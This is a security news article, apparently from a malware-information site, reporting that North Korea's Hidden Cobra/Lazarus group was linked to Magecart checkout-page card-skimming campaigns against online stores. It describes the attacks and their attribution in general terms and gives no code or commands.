Hidden Cobra relations with digital skimming activities revealed

North Korean hackers linked with Magecart web skimming attacks, according to the latest report

Hidden Cobra relying digital skimming Security firm revealed e-skimming campaigns related to the North Korea state-sponsored hacker group.

North Korean hackers widen their range from cryptocurrency exchange hacking and ransomware deployment to online stores.[1] Reports show that APT Lazarus or Hidden Cobra group use web skimming techniques against US and European shoppers.[2] According to Sansec[3] analysis, hackers started breaking into online stores and spreading payment skimmers back in May 2019.

These state-sponsored hackers are known for ransomware distribution, cryptocurrency market operations, and other malicious activities that earned these criminals more than $2 billion.[4] The further analysis of recent attacks revealed that they extended the portfolio of criminal behavior and started to rely on digital skimming techniques. Infrastructure from other operations related to Hidden Cobra got used again, so patterns revealed that hacks were held by the same group.

Distinctive patterns in the malware code were identified that linked multiple hacks to the same actor.

Various sites used to run the global skimming campaign

Since the goal of these operations is to gain access to the e-commerce servers and other resources, these attacks require some skills from the attackers. The particular malware code is launched on the check out page, so silently malware logs all the credit card details when users enter the information into the checkout form. Once data is collected, it can be exfiltrated to a remote server and hackers then collect the valuable information and can use it or sell on the dark web market.

The report revealed that sites of an Italian modeling agency, book store from New Jersey, vintage music store from Tehran, and other websites got used to runt the e-commerce skimming campaign. The global exfiltration network was also developed, so legitimate sites got hijacked and repurposed as a disguise for the data exfiltration activities.

Stolen information got on servers with IP addresses that particular North Korean hackers used previously. The name of these hackers differs from Lazarus Group to Hidden Cobra, because the US Department of Homeland Security and other investigators dubbed the group separately. Nevertheless, many evidence points to the particular group no matter the name.

Digital skimming continue growing as a type of fraud

Once the hacker gets inside the server of a particular retailer, the Magecart script is injected on the checkout page. The skimmer collects any data that customers put it at this point, so credit card numbers and other details can easily get infiltrated. Such information can be extremely valuable in the dark web, so the popularity of such attacks raises quickly.

Magecart[5] is the digital skimming method that is a type of fraud focusing on the interception of credit card during online purchases. In many cases, hackers running their operations in this field were Russians or Indonesians. However, recent years show that since 2015, hackers from various countries try to gain profits using these methods.

Hidden Cobra has already gained attention for the modification of the store code of the fashion chain Claire's.[6] Attacker used spearphishing attacks and obtained passwords of the staff. Unfortunately, more information about this particular attack is not published.

About the author
Ugnius Kiguolis
Ugnius Kiguolis - The mastermind

Ugnius Kiguolis is a professional malware analyst who is also the founder and the owner of 2-Spyware. At the moment, he takes over as Editor-in-chief.

Contact Ugnius Kiguolis
About the company Esolutions